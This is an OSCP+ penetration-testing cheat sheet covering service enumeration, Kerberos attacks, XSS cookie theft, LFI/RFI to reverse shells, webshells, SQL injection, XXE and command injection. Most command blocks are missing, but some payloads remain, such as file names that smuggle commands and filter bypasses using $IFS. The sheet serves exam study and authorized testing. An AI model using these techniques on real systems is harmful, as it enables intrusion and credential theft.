🍕OSCP+ Cheat Sheet

1. 🕵️‍♂️ Information Gathering

1.1 Passive Information Gathering

whois

whois [domain]

# Specify a different whois server 
whois [domain] -h [server]

Google Dorks

• site:somesite.com or site:somesite.com -filetype:html

• filetype:txt or ext:txt

• intitle:"somethig"

• Google Hacking Database

Other Tools

• Netcraft

• gitrob and gitleaks

• Shodan.

• Security Headers

• SSL/TLS

1.2 DNS Enumeration

• host [domain]

• host -t txt [domain]

• host [subdomain].[domain]

• nslookup -type=TXT [domain] [use_specific_dns_server_optional]

• Automatic brute-force of DNS: for ip in $(cat list.txt); do host <ip>.[domain]; done

1.3 Port Scanning

1.3.1 Netcat

1.3.2 Nmap

Nmap StationX CheatSheet

1.3.2.1 Personal Methodology

1.3.2.2 Scan Types

1.3.2.3 Detection and Scanning

1.3.2.4 Saving Results

1.3.2.5 Nmap Scripting Engine (NSE)

(Scripts located in /usr/share/nmap/scripts/)

1.3.2.6 PowerShell Functions

1.3.3 RustScan

1.4 Specific Port Services

1.4.1 21: FTP

Nmap Scripting scan

Enumeration

Upload binaries

Downloading files recursively

Brute Force

Passive Mode Syntax

1.4.2 22: SSH

Nmap Scripting Scan

Brute Force Common Credentials

User Obtained Private Key

Convert PuTTY Key to OpenSSH Format

Crack SSH Private Keys

Finding Private Keys

Possible Errors

Download Files from Remote Host

Upload Files to Remote Host

Exploit SSH with Specific Options

1. Bypass Host Key Checking: disables the host key checking mechanism, which is normally used to ensure that the SSH server you're connecting to is the one you expect. By setting UserKnownHostsFile to /dev/null and StrictHostKeyChecking to no, you can bypass this check, which might be useful in environments where SSH keys are not properly managed.

1. Force a Different Cipher: forces the use of a specific encryption cipher (in this case, aes128-cbc). This option can be exploited if the server is vulnerable to weaknesses in a particular cipher or if a certain cipher is known to be poorly configured.

1. Force an Older SSH Version: forces SSH to use protocol version 2, which is more secure than version 1. However, if a server still supports SSH version 1, you can try to exploit vulnerabilities in the older protocol by forcing it with -1; this can sometimes reveal older, less secure configurations or bugs in the SSH service.

1. SSH Reverse Shell with Weak Cryptographic Algorithms: used to exploit a vulnerable SSH server by forcing it to use outdated and weak cryptographic algorithms (diffie-hellman-group1-sha1 and ssh-rsa); the SSH command initiates a connection to the target server, then executes a reverse shell that connects back to the attacker's machine.

1. Execute a Command Upon Connection: ssh user@target_ip "whoami"

RCE with SCP Wrapper Steps:

1. Create an SCP Wrapper Script: This script intercepts SCP commands. If the original SCP command is detected, it executes normally. Otherwise, it triggers a reverse shell back to the attacker's machine.

2. Upload the Malicious Script: Use SCP to transfer this script to the target machine, placing it in a directory where it will be executed.

3. Trigger the Script: SSH into the target machine, and the wrapper script will execute the reverse shell or specified commands, providing remote access.

4. Catch the Shell: Use a tool like Netcat (nc) to listen for the incoming reverse shell connection on your attacker's machine.

• SCP Wrapper Script

• Upload SCP Wrapper and Start Listener

• Connect to the victim

1.4.3 23: Telnet

1.4.4 25: SMTP

Enumeration

Python Script for Enumeration

Installing Telnet Client for Windows

Exploitation with SMTP Postfix Shellshock Exploit

1.4.5 53: DNS

Nmap Scripting Scan

Enumerating AD Domain via DNS

Basic DNS Enumeration

Zone Transfer

Reverse Lookup

DNS Cache Snooping

Enumerate DNS with PowerShell (Windows)

1.4.6 69: TFTP

Nmap Scripting Scan

Enumeration Script

File Download

File Upload

Brute Force Download

Automating TFTP Operations

1.4.7 88: Kerberos

Nmap Scripting Scan

Enumerate Kerberos Principal Names: use kerbrute to enumerate valid user accounts by attempting to authenticate with a list of usernames.

Perform Kerberos Ticket Extraction (AS-REP Roasting): request non-preauthenticated Kerberos tickets for a list of users.

Perform Kerberos Ticket Request with AS-REP Roasting: request a Ticket Granting Ticket (TGT) for a specific user.

Crack Kerberos Tickets

Kerberos Ticket Extraction: request a TGT or Service Ticket (TGS) using specified credentials.

Kerberoasting: extract and crack service tickets to gain access to service accounts.

Kerberos Brute Forcing: perform brute force attacks on Kerberos tickets.

Kerberos Ticket Manipulation: use tools to request, manipulate, and renew Kerberos tickets for privilege escalation or impersonation.

Kerberos Ticket Dumping: extract Kerberos tickets from memory for offline analysis.

Kerberos Pre-Authentication: identify weak configurations that might allow attackers to perform brute force attacks.

Kerberos Silver Ticket Attacks: forge high-value Kerberos tickets for access and privilege escalation.

Steps to Perform Silver Ticket Attack

Kerberos Golden Ticket Attacks: forge high-value Kerberos tickets for access and privilege escalation.

Steps to Perform Golden Ticket Attack

Additional Reference: https://www.tarlogic.com/blog/how-to-attack-kerberos/

1.4.8 110: POP3

Nmap Scripting Scan

Connect and test Login

Brute Force Login

Read Mail via Telnet

1.4.9 111: RPC

Nmap Scripting Scan

Discover RPC Services Using RPCinfo

Identify Available RPC Services

1.4.10 135, 593: MSRPC

Nmap Scripting Scan

Enumerating MSRPC using rpcdump

Enumerate RPC over HTTP Services

Enumerating RPC with rpcclient

Commands for rpcclient

User Enumeration

Group Enumeration

Alias Group Enumeration

Domain Enumeration

Brute Force User/Password/SID

Additional SID Information

Set User Info with rpcclient

The setuserinfo function in rpcclient is used to modify user account information on a remote Windows system. The level parameter indicates the detail of information to modify or retrieve:

• Level 0: Basic info (username, full name).

• Level 1: Additional info (home directory, script path).

• Level 2: Further info (password age, privileges).

• Level 3: Detailed info (all above + group memberships).

• Level 4: Most detailed info (all above + SID).

To change a user's password, use setuserinfo2 with a level of 23. This level includes basic attributes and adds password management functionality. The setuserinfo function typically does not handle password changes directly; setuserinfo2 is preferred for this purpose.

1.4.11 139, 445: SMB

Host Enumeration

Nmap Scripting Scan

Advanced Enumeration

SMB Enumeration with smbmap

SMB Enumeration with crackmapexec

User Enumeration with enum4linux

SMB Client Operations

Brute Force Credentials

Mounting Shares

Execute Remote Commands

Exploitation (EternalBlue - MS17-010): https://github.com/3ndG4me/AutoBlue-MS17-010

PsExec

WMIExec

1.4.12 143, 993: IMAP

Nmap Scripting Scan

Banner Grabbing Connect to the server to identify software/version.

Search for Vulnerabilities

Check for Supported Capabilities

1.4.13 161 (UDP): SNMP

Nmap Scripting Scan

Basic Enumeration

Brute Force Community Strings

Using onesixtyone Without a Community File

Extended Queries Enumeration

Advanced Enumeration with Specific OIDs

OID Specific Codes

Additional Reference: https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

Modifying SNMP Values: http://net-snmp.sourceforge.net/tutorial/tutorial-5/commands/snmpset.html

1.4.14 389, 636, 3268 & 3269: LDAP

Nmap Scripting Scan

Ldapsearch Basic Enumeration

Check Pre-Authentication for Users

Useful Search Terms

1.4.15 1433: MSSQL

Nmap Scripting Scan

Crackmapexec

Logging In

Exploitation

Database Usage

1.4.16 2049: NFS

Nmap Scripting Scan

Enumeration

Mounting

1.4.17 3003: CGMS (possible)

Enumeration

Exploitation (CVE-2020-13151) This exploit targets Aerospike's REST API to gain remote code execution. Ensure that you have authorization before using this.

Possible Available Commands for Information Gathering

1.4.18 3306: MYSQL

Nmap Scripting Scan

Crackmapexec

Brute Force

Loggin In

Database Usage

Exploitation Examples

Check System Permissions of the DB User

1.4.19 3389: RDP

Nmap Scripting Scan

Brute Force

Password Spray

Logging In

1.4.20 5432, 5433: PostgreSQL

Nmap Scripting Scan

Brute Force

Password Spraying

Logging In

RCE

Code Execution

Database Usage

1.4.21 5900: VNC (Virtual Network Computing)

Nmap Scripting Scan

Connecting

Brute Force

Common Default Credentials

Usage Once Connected

1.4.22 5985, 5986: WinRM

Nmap Scripting Scan

Crackmapexec

Loggin In

Exploitation

1.4.23 6379: Redis

Nmap Scripting Scan

Brute Force

Exploit

Connect and Interact

Redis Pentesting Reference: https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis

Redis Rogue Server GitHub: https://github.com/n0b0dyCN/redis-rogue-server

Redis RCE: https://github.com/jas502n/Redis-RCE?tab=readme-ov-file

1.4.24 Unkown Port

Enumeration

Interaction

Usage Examples

Service Specific Actions

2. 🔎 Vulnerability Scanning

2.1 Nessus

Note: The use of Nessus is forbidden during the exam. This tool should be used only in your personal lab environment for practice purposes.

Nessus is a powerful vulnerability scanning tool that can identify vulnerabilities, misconfigurations, and compliance issues. Here's how you can install and set it up:

1. Download Nessus

1. Verify the Download

1. Install Nessus

1. Start Nessus

2.2 Nmap NSE (Nmap Scripting Engine)

Nmap's NSE is a versatile tool that allows you to extend Nmap’s capabilities with custom scripts. By utilizing these tools effectively, you can identify vulnerabilities in your environment or during penetration testing engagements. However, remember to always follow ethical guidelines and ensure that you have proper authorization before scanning any systems.

1. Basic Usage

1. Script Management

3. 🕷️ Web Applications

3.1 Enumeration

3.1.1 FingerPrinting

Web Technology Detection

HTTP Methods Testing

Advanced Fingerprinting Tools

3.1.2 Directory Discovery

3.1.2.1 FFUF

3.1.2.2 DIRB

3.1.2.3 GOBUSTER

3.1.2.4 FEROXBUSTER

3.1.2.5 DIRSEARCH

3.1.2.6 WFUZZ

3.1.3 File Discovery

3.1.3.1 FFUF

3.1.3.2 DIRB

3.1.3.3 GOBUSTER

3.1.3.4 FEROXBUSTER

3.1.3.5 DIRSEARCH

3.1.4 Git Exposed

In the case we found a git directory exposed in the web server. Git Dumper (https://github.com/arthaud/git-dumper) is a tool used to dump the contents of exposed .git directories. These directories may contain sensitive information, including source code, configuration files, and credentials. The tool allows you to download and explore these contents to find vulnerabilities or sensitive data.

An alternative to this tool could be the scripts gitdumper.sh and extractor.sh (check Tools Section).

3.1.5 CMS

• WP Scan

• WP Brute Forcing

• Custom Path

• Enumerate Users

• Malicious Plugins

• Drupal Scan

• .git Directory

• simple-file-list Exploitation

• Generate Keyword Dictionary: if the website contains written content, create your own keyword dictionary.

• Detect Vulnerable Pluging

3.1.6 WebDav

Reference: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/put-method-webdav

Nmap Scan Results

Connecting to a WebDAV Server

Exploitation with Credentials

1. Generate a Reverse Shell Payload

1. Upload Payload via WebDAV

1. Start the listener

1. Trigger the Payload: access the uploaded shell http://$VictimIP/shell.aspx

3.1.7 APIs

3.1.8 Wordlists

• Directory discovery: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

• File discovery: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

• PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#exploit-code-or-poc

• SecLists directory: /usr/share/seclists/Discovery/Web-Content/common.txt

• SecLists file: /usr/share/seclists/Discovery/Web-Content/big.txt

• Custom Wordlist from HTML:

• LFI Wordlist for Linux: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt

• LFI Wordlist for Windowshttps://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt

• General LFI Wordlist alternative: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

3.2 XSS

3.2.1 Theory

Common characters to find it in input fields: < > ' " { } ;.

3.2.2 Stored

Basic Payload for Testing: if it is vulnerable once saved, when we access the website again we should see the code being executed.

3.2.3 Reflected

In this case usually we will include the payload in a URL, the most common place for this are the search pages, we can see the example below:

3.2.4 Blind

A good way to test this is to see if we can retrieve files externally using the JavaScript code, we can use the payloads from PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#exploit-code-or-poc.

3.2.5 PrivEsc Using Session Hijacking

We need to make sure that the cookie is stored in the browser, we also need to consider that cookies can have two flags:

• Secure: only sends the cookie over an encrypted connection like HTTPS.

• HttpOnly: denies Javascript access to cookie; so we need that this options de disabled, you can check this in the Developer Tools of the browser.

After verifying that the cookie could be steal by its flags and having a valid XSS field we can use one of the following payloads:

• Option 1

• Option 2:

3.2.6 Wordpress HttpOnly Cookie (Visitor Plugin)

1. Gather WordPress Nonce: to attack with a HttpOnly cookie on WordPress: We need to create a Js function that fetches the nonce which is a server generated token to prevent CSRF attacks.

1. Create New WordPress Admin Account

1. Compress the JavaScript Code: use the tool JSCompress.

1. Encode the JavaScript Payload: use the following JS function.

1. Request and Execute the Payload: the function eval is responsible for interpreting the string as code and execute it.

3.2.7 Automated Discovery

• We can use the tool XSS Strike:

• We can also use fuzzing (sometimes trying the user-agent could also reveal a vulnerable field):

• Wordlist: https://github.com/tennc/fuzzdb/blob/master/attack-payloads/xss/xss-rsnake.txt.

3.3. File Inclusion

3.3.1 Local File Inclusion (LFI)

Local File Inclusion (LFI) allows attackers to read or execute files on the server by exploiting file inclusion mechanisms.

3.3.1.1 Scanning for LFI

• URL LFI Example:

• Normal Fuzzing:

• Fuzz GET Parameters:

• Fuzz PHP Files:

• Fuzz Webroot: to fuzz for index.php use wordlist for Linux or wordlist for windows, or this general wordlist alternative; consider that depending on our LFI situation, we may need to add a few back directories (e.g. ../../../../), and then add our index.php afterwords.

• Fuzz Server Logs and Configs: we can use the same wordlists as before.

3.3.1.2 Bypassing LFI Protections

Sometimes protections are in place to prevent directory traversal. These are common techniques to bypass such restrictions:

3.3.1.3 LFI Wrappers

Wrappers are mechanisms that let you change the file processing behavior to reveal sensitive data or interact with server components:

• Base64 encode a file:

• ROT13 encoding:

• PHP Wrapper:

3.3.1.4 Remote Code Execution via LFI

3.3.1.4.1 Log Poisoning (Apache or SSH Logs)

If log files such as /var/log/apache2/access.log or /var/log/auth.log are accessible through LFI, you can inject malicious code into the logs to achieve RCE.

1. Verify if log files can be accessed via LFI:

1. Inject a malicious PHP payload into the logs via SSH:

1. Access the log file via LFI to execute the payload:

3.3.1.4.2 Mail PHP Execution (RCE via Email)

Using LFI, after enumerating users (e.g., /etc/passwd), you can attempt to execute PHP code through a mail server by embedding PHP in email data.

1. Connect to the mail server:

1. Inject PHP payload into the email service:

1. If unsure about the users on the system, perform user enumeration:

3.3.1.5 Reverse Shell via LFI

You can use /proc/self/environ to inject a shell. If the environment variables are writable, inject PHP code into the environment.

1. Send the PHP payload:

1. Access the file via LFI to trigger the reverse shell:

3.3.1.6 Useful Tools

• LFISuite: A tool to automate exploitation of LFI vulnerabilities.

• RFIScanner: A simple Python-based RFI vulnerability scanner.

3.3.2 Remote File Inclusion (RFI)

Remote File Inclusion (RFI) allows attackers to include external files into the web server’s execution context, potentially leading to Remote Code Execution (RCE).

3.3.2.1 Basic RFI Example

If a web application allows including a remote file, you can execute arbitrary code by referencing an external malicious script:

3.3.2.2 Reverse Shell via RFI

1. Start a Simple HTTP Server:

1. Host the malicious PHP reverse shell (e.g., revshell.php) on your own server:

1. Perform Remote File Inclusion:

3.3.3 WordPress Plugin for Reverse Shell

If you gain access to an admin WordPress panel, you can navigate to Theme > Appearance > Editor > 404 Template. There, you can modify the PHP code to include your malicious web shell. For example, refer to Section 3.3.3.3 for the code that allows you to access the shell at: http://[IP]/[cms-path]/wp-content/nonexistent?cmd=[command].

Alternatively, you can use the payload multi-os-php-reverse-shell.php, which automatically triggers a reverse shell when accessed. For a more complex approach, you could use a GitHub tool to create a malicious plugin, upload it, and obtain the reverse shell, as described in the below Sections 3.3.3.1 and 3.3.3.2.

3.3.3.1 Malicious WordPress Plugin Generators

• With Meterpreter

• Without Meterpreter

3.3.3.2 Reverse Shell Options

• Two Reverse Shell Options

• WordPress Backdoor Exploit

3.3.3.3 PHP Webshell

3.3.3.4 ASP Webshell

3.3.3.5 Non-Meterpreter Payload for Netcat

3.3.4 Files and Paths to Target (LFI & RFI)

3.3.4.1 Common Linux Files

3.3.4.2 Common Windows Files

3.3.5 PHP Wrappers

• php://filter

• php://data

3.3.6 OS Command Injection

• Detect Windows Commands Execution:

• Download and Execute PowerCat Reverse Shell:

• Executing Command Injection:

3.4 File Upload

This vulnerability occurs in web applications where users can upload files without security checks to prevent potential dangers. This allows an attacker to upload files with code (such as .php or .aspx scripts) and execute them on the server.

3.4.1 Disabling Frontend Validation

Options:

1. Use the Browser Inspector to find the function that validates the file, delete it and then upload the file, keep in mind that this will not work if the validation is at server-level.

2. Use BurpSuite and send a normal request, intercept it and then modify it to our malicious form and then send it.

3.4.2 Extensions Blacklist

Keep in mind that for Windows Servers file extensions are case sensitive, a wordlist we can use for fuzzing extension with either ffuf or BurpSuite (do not do URL encode) is https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt.

3.4.3 Extensions Whitelist

We can perform a fuzzing or use a script to find if there is a whitelist of file extensions.

3.4.4 Bypassing Filters

We have different options to do so:

1. Changing File Extensions: if direct upload of .php files is restricted or filtered, try alternative extensions that might bypass filters.

1. Use .htaccess: if the application allows .htaccess file uploads, you can exploit it to change file handling settings: AddType application/x-httpd-php .dork; then, upload a file with the .dork extension, which might be interpreted as PHP and could contain a reverse shell or web shell.

1. Double Extension: upload files with double extensions like shell.php.jpg or shell.php.jpeg to bypass simple filters.

1. Characters Injection: try using null byte injection to bypass filters, e.g., shell.php%00.jpg; or inject characters before or after the final extension:

1. MIME (Multipurpose Internet Mail Extensions) Type Spoofing: use tools or manual methods to alter the MIME type of the file being uploaded. Inspecting the initial bytes of a file reveals its File Signature or Magic Bytes. For instance, (GIF87a or GIF89a) signifies a GIF image, while plaintext indicates a Text file. Altering the initial bytes to the GIF magic bytes changes the MIME type to a GIF image, disregarding its remaining content or extension. GIF images uniquely start with ASCII printable bytes, making them easy to imitate. The string GIF8 is common to both GIF signatures, simplifying GIF image imitation.

3.4.5 File Execution

This is a very important step because if we have successfully upload a webshell or a malicious file we want to be able to execute it to get a reverse shell or execute our malicious code.

For this attempt to access uploaded files via URL, and ensure the uploaded file is executed in a web-accessible directory. If we want to get a reverse shell check the Utilities Section for commands, or use https://revshells.com/.

3.4.6 Embed Code into Images

We can use exiftool for this, then we just need to rename it.

3.4.7 Embed Code into File Names

A common file upload attack uses a malicious string for the uploaded file name, which may get executed or processed if the uploaded file name is displayed on the page, or directly executed in the server.

For example, if we name a file file$(whoami).jpg or filewhoami.jpg or file.jpg||whoami, and then the web application attempts to move the uploaded file with an OS command (e.g. mv file /tmp), then our file name would inject the whoami command, which would get executed, leading to remote code execution.

3.5 SQL Attacks

3.5.1 Tools for Connecting Usage

3.5.1.1 MySQL for MySQL (Linux)

3.5.1.1.1 Initial Connection

If you have MySQL credentials:

3.5.1.1.2 Common Queries

• Check MySQL Version:

• List All Databases:

• Switch to a Specific Database:

3.5.1.1.3 Enumerating Tables and Columns

• List All Tables in the Current Database:

• List All Columns in a Specific Table:

3.5.1.1.4 User Enumeration and Privileges

• List All Users:

• Check User Privileges:

3.5.1.1.5 Data Extraction

• Extract Data from a Table:

3.5.1.1.6 Command Execution via User-Defined Functions (UDFs)

In MySQL, command execution can be achieved via User-Defined Functions (UDFs), if applicable. Here's an example of how to upload a malicious shared object file to gain shell access:

1. Upload UDF library:

1. Create the UDF to execute system commands:

1. Execute Commands:

3.5.1.1.7 Reverse Shell

If you can execute commands via UDF or another method, you can establish a reverse shell:

1. Set up a listener on your machine:

1. Use the following MySQL command to initiate the reverse shell:

3.5.1.1.8 Where to Get Your .so for UDF

To perform the command you're referencing, which aims to create and load a User Defined Function (UDF) into MySQL by injecting a .so file, you typically need to either:

1. Compile your own .so file that contains the malicious function (or any other intended functionality).

2. Use an existing .so file already present on the system.

COMPILE YOUR OWN .SO FILE If you want to create your own .so file (such as a UDF for MySQL), follow these steps:

1. Write the UDF Code: you need a .c file that contains the code for your UDF. For instance, if you're compiling the lib_mysqludf_sys.so library (which allows you to execute system commands), you need the source code for it; here’s an example of how to create this file:

1. Compile the .so File: once you have the UDF code, you can compile it into a shared object (.so) file. You’ll need the mysql-server-dev package to get the necessary header files.

1. Inject the .so File into MySQL: after compiling the .so file, you can inject it into the MySQL database using the SQL command you provided.

1. Register the UDF in MySQL: once the .so file is injected, register the function in MySQL.

1. Execute system commands directly from MySQL using:

USE AN EXISTING .SO FILE If you already have a .so file on the system, such as lib_mysqludf_sys.so, you can directly reference it in your command. In that case, you don’t need to compile the file yourself. Simply adjust the SQL command as follows:

3.5.1.2 Mssqlclient for MSSQL (Windows)

3.5.1.2.1 Initial Connection

3.5.1.2.2 Common Queries

• Check SQL Server Version:

• List All Databases:

• Switch to a Specific Database:

3.5.1.2.3 Enumerating Tables and Columns

• List All Tables in a Database:

• List All Columns in a Specific Table:

3.5.1.2.4 User Enumeration and Privileges

• List All Users in a Database:

• Check User Privileges:

3.5.1.2.5 Data Extraction

• Extract Data from a Table:

3.5.1.2.6 Commands Execution

• Enable xp_cmdshell (if permissions allow):

• Execute OS Command:

• Reverse Shell via xp_cmdshell: if xp_cmdshell is enabled, you can establish a reverse shell back to your machine. First, set up a listener on your machine:

3.5.1.3 Tips

• MSSQL vs. MySQL: MSSQL offers xp_cmdshell for command execution, whereas MySQL often relies on UDF-based exploits or file uploads for system interaction.

• Interactive Shells: Always attempt to establish a stable reverse shell after gaining execution on either MSSQL or MySQL.

3.5.2 SQL Injection

3.5.2.1 Common SQL Functions

• MySQL

• MSSQL

3.5.2.2 Error-Based Payloads

Simple authentication bypass

Get the version

Dump all or specific data

• Dump all data:

• Dump specific data:

3.5.2.3 UNION-Based Payloads

• Check Column Count: for both MySQL and MSSQL, determine the number of columns the SELECT query expects.

• Use wfuzz to Find Number of Columns

• Database Enumeration: retrieve the name of the current database.

• Table Enumeration: list all the tables from the current database.

• Column Enumeration: list all the columns in a specific table.

• Retrieve Information From Other Databases

• Retrieve Data from Columns: extract data from specific columns.

• Determine Number of Columns: find the correct number of columns.

• Identify Union Columns: identify which columns are injectable.

• Dump Table Content to FileSystem: write content from a table into a file.

• Print SQL Version: determine the database version.

• Print User Running the Query: retrieve the user currently running the query.

• Print Database Directory: identify the database directory location.

• Print Table Names: retrieve a list of table names.

• Print Column Names: retrieve a list of column names from a specific table.

• Print Content of a Column: extract specific content from a column.

• Use AND Statement as Comment Alternative: when comments are blocked, use an AND statement.

3.5.2.4 Blind Payloads

Blind SQL Injection allows attackers to infer the database's behavior indirectly by examining server responses or delays. Below are techniques applicable to MySQL and MSSQL.

3.5.2.4.1 Checking for Vulnerability

• Basic Check:

• Reflected Input Check: use these commands to determine if the input is being reflected in the output.

3.5.2.4.2 Extracting Database Information

• Extract Database Version: test for the database version using the SUBSTRING (MySQL) or SUBSTRING (MSSQL) functions.

• Extract Database Name: extract the database name using SUBSTRING and delay response for a true condition.

3.5.2.4.3 Extracting Table and Column Names

• Find Table Names: extract the first table name from the database.

• Find Column Names in a Table: extract column names from a specific table.

3.5.2.4.4 Extracting Data

• Retrieve Specific Data: extract specific characters from the data using SUBSTRING or equivalent logic.

• Character Enumeration in Database: use character enumeration to brute-force data extraction.

3.5.2.4.5 Boolean-Based

• Determine Database Name: extract the database name using the SUBSTRING function.

3.5.2.4.6 Time-Based

• Login Panel Injection (MySQL & MSSQL): test for time-based SQL injection by delaying the response.

• Using Time-Based Conditions: use conditions to trigger delays, depending on the true/false evaluation of a statement.

• Confirm a Time-Based Blind SQL Injection: force the application to sleep if the query returns true.

• Determine Database Version: identify the database version by inducing a delay based on the condition.

• Determine Database Name with wfuzz: this command checks each character of the database name by comparing its ASCII value.

• Determine Table Name with wfuzz: the query retrieves the ASCII value of each character in the first table name.

• Determine Column Name with wfuzz: this command retrieves the column names from the targeted table using the information_schema.columns.

• Extract Column Content with wfuzz: he query extracts content from a particular column by comparing ASCII values character by character.

3.5.2.5 Login Bypass Commands

• MySQL:

• MSSQL:

3.5.2.6 Vulnerable Code Example

PHP Login Page

3.5.3 SQL Truncation

Truncation-based SQL injection occurs when the database limits user input based on a specified length, discarding any characters beyond that limit. This can be exploited by an attacker to manipulate user data. For example, an attacker can create a new user with a name like 'admin' and their own password, potentially causing multiple entries for the same username. If both entries are evaluated as 'admin', the attacker could gain unauthorized access to the legitimate admin account.

In the following example, the database truncates the username after a certain length (e.g., 10 characters). The attacker uses this to create a conflicting account:

3.5.4 Specific Databases

3.5.4.1 MSSQL

3.5.4.1.1 Default Databases

• master: keeps the information for an instance of SQL Server.

• msdb: used by SQL Server Agent.

• model: a template database copied for each new database.

• resource: a read-only database that keeps system objects visible in every database on the server in sys schema.

• tempdb: keeps temporary objects for SQL queries.

3.5.4.1.2 Common Commands

• List Databases:

• Show Tables:

• Show Tables and Their ID:

• Concatenate Columns:

• Test xp_cmdshell:

• Get a Hash:

3.5.4.1.3 Statement Examples

3.5.4.1.4 Remote Code Execution (RCE)

For MSSQL on windows we can run any code in SQL Injection, we need to do the following to get the code execution.

3.5.4.1.5 Impersonation

1. Check for Users we can Impersonate:

1. Perform the Impersonation:

1. Verify Current User and Role:

1. (Optional) Check Linked Databases:

1. (Optional) Enable xp_cmdshell:

3.5.4.1.6 Extra References

• From MSSQL Injection to RCE

• PayloadsAllTheThings MSSQL Injection

• MSSQL Practical Injection Cheat Sheet

3.5.4.2 MySQL

3.5.4.2.1 Default Databases

• mysql: it is the system database that contains tables that store information required by the MySQL server.

• information_schema: provides access to database metadata.

• performance_schema: it is a feature for monitoring MySQL Server execution at a low level.

• sys: a set of objects that helps DBAs and developers interpret data collected by the Performance Schema.

3.5.4.2.2 Common Commands

• Connect to the Database:

• Show Databases:

• Show Tables:

• Write a File:

• Other Commands:

3.5.4.2.3 Remote Code Execution (RCE)

For mysql the idea is to write a php file that will lead to command execution via a web app.

3.5.4.2.4 Extra References

• PayloadsAllTheThings MSSQL Injection

3.5.4.3 MariaDB

3.5.4.3.1 Common Commands

• Basic SQL Injection:

• Alternative Syntax:

• Union-Based Data Extraction (Column Guessing):

• Extract Table and Column Information:

• Extract Data from Target Table:

3.5.4.3.2 Extra References

• MariaDB SQL Injection Example

3.5.4.4 Oracle

3.5.4.4.1 Common Commands

• Union SQL Injection with dual Table: Oracle databases often use the dual table for testing purposes.

• Correcting Number of Columns: adjust the number of columns to avoid errors.

• Retrieve User Information: extract usernames from Oracle’s internal tables.

• Dump Table and Column Names: extract table names and column names from the Oracle database.

• Dump Data from Table: finally, retrieve specific data from a target table.

3.5.4.4.2 Login Bypass

• Example of bypassing Oracle DB login:

3.5.4.4.3 Union-Based Injection (Dump Creds)

• Reference: SecurityIdiots Oracle Injection

3.6 XXE (XML External Entity) Injection

3.6.1 Identifying

XXE vulnerabilities occur when an application parses XML input from untrusted sources and processes external entities. An attacker can manipulate the XML content to read sensitive files from the system; these are the parts of the XML file.

3.6.2 Local File Disclosure

In this case data is being sent in the XML, so we can change it and test different variables (&[variable];) to display information.

3.6.3 Reading Sensitive Files

Consider that in certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.

• Reading the /etc/passwd File

• Reading a Custom File

• Accessing Local Files

• Blind XXE

• XXE with Network Access

3.6.4 Reading Source Code

In this case we need to be careful because if we are referencing something that is not in proper XML format the External XML Entity vulnerability will not work, this can happens if the file contains XML special characters (eg. | < > { } &); for these cases we could base64 encode them.

3.6.5 Remote Code Execution

In this case we need to be careful with special characters (| < > { } &) as well, as they will break our command, you could even consider encode them. For case see that in example below we replaced all spaces in the above XML code with $IFS, to avoid breaking the XML syntax.

3.7 IDOR (Insecure Direct Object References)

For example, if users request access to a file they recently uploaded, they may get a link to it such as (download.php?file_id=123). So, as the link directly references the file with (file_id=123), what would happen if we tried to access another file (which may not belong to us) with (download.php?file_id=124) If we can access it that means there is a broken access control.

3.7.1 Enumeration

Whenever we receive a specific file or resource, we should study the HTTP requests to look for URL parameters or APIs with an object reference (e.g. ?uid=1 or ?filename=file_1.pdf). These are mostly found in URL parameters or APIs but may also be found in other HTTP headers, like cookies.

Another example could be that the UID of the user is being used by adding it to a part of the filename, from the example below we can see that there could be no access control and therefore create a script to perform the enumeration of all files:

3.7.2 AJAX Calls

We may also be able to identify unused parameters or APIs in the front-end code in the form of JavaScript AJAX calls. Some web applications developed in JavaScript frameworks may insecurely place all function calls on the front-end and use the appropriate ones based on the user role.

The above function may never be called when we use the web application as a non-admin user. However, if we locate it in the front-end code, we may test it in different ways to see whether we can call it to perform changes, which would indicate that it is vulnerable to IDOR. We can do the same with back-end code if we have access to it.

3.7.3 Hashing & Encoding

Sometimes the reference is encoded or hashed (file_123.pdf):

• Encoded: download.php?filename=ZmlsZV8xMjMucGRm

• Hashed: download.php?filename=c81e728d9d4c2f636f067f89cc14862c

3.7.4 Compare User Roles

If we want to perform more advanced IDOR attacks, we may need to register multiple users and compare their HTTP requests and object references. This may allow us to understand how the URL parameters and unique identifiers are being calculated and then calculate them for other users to gather their data.

If we have 2 users one of which can view the salary with the API call; repeat the same API call as User2 . If it works means that the web app requires only a valid logged-in session to make API call but there isno access control on backend to verify the data being called by the user :

3.7.5 Insecure APIs

We could see calls to APIs like the one below, in such cases we can perform enumeration of the API similar to the web application, if there is some form of backend control, we could try changing both the UID (for this example) and the URL.

3.8 Command Injections

3.8.1 Identifying

• Detect Windows Commands Execution:

• Vulnerable Code Example:

• Executing Command Injection:

3.8.2 Command Methods

The only exception may be the semi-colon ;, which will not work if the command was being executed with Windows Command Line (CMD), but would still work if it was being executed with Windows PowerShell.

3.8.3 Bypassing Filters

3.8.3.1 Space is Blacklisted

• Use %09 (tab).

• Use $IFS

• Use Brace expansion i.e {ls,-la}

3.8.3.2 / or \ are Blacklisted

• Linux: use environment paths.

• Windows: use environment paths.

3.8.3.3 Commands are Blacklisted

• Example of code that has blacklisted commands:

• General Solution: add Characters that are ignored by the shell.

• Linux Only: add \ or $@

• Windows Only: add ^

3.8.3.4 Reverse Commands

3.8.3.5 Encoded Commands

3.8.4 Automatic Tools

• Linux (Bashfuscator)

• Windows (DOSfuscation)

3.9 Log4Shell

1. Identify a Vulnerable System

2. Craft the Exploit Payload: these payloads are not reverse shells themselves but are the triggering mechanism to call back to your server, allowing you to serve more malicious content, like a reverse shell, when the server reaches out to your attacker-controlled LDAP or RMI server.

1. Inject the Payload

1. Setup the Listener

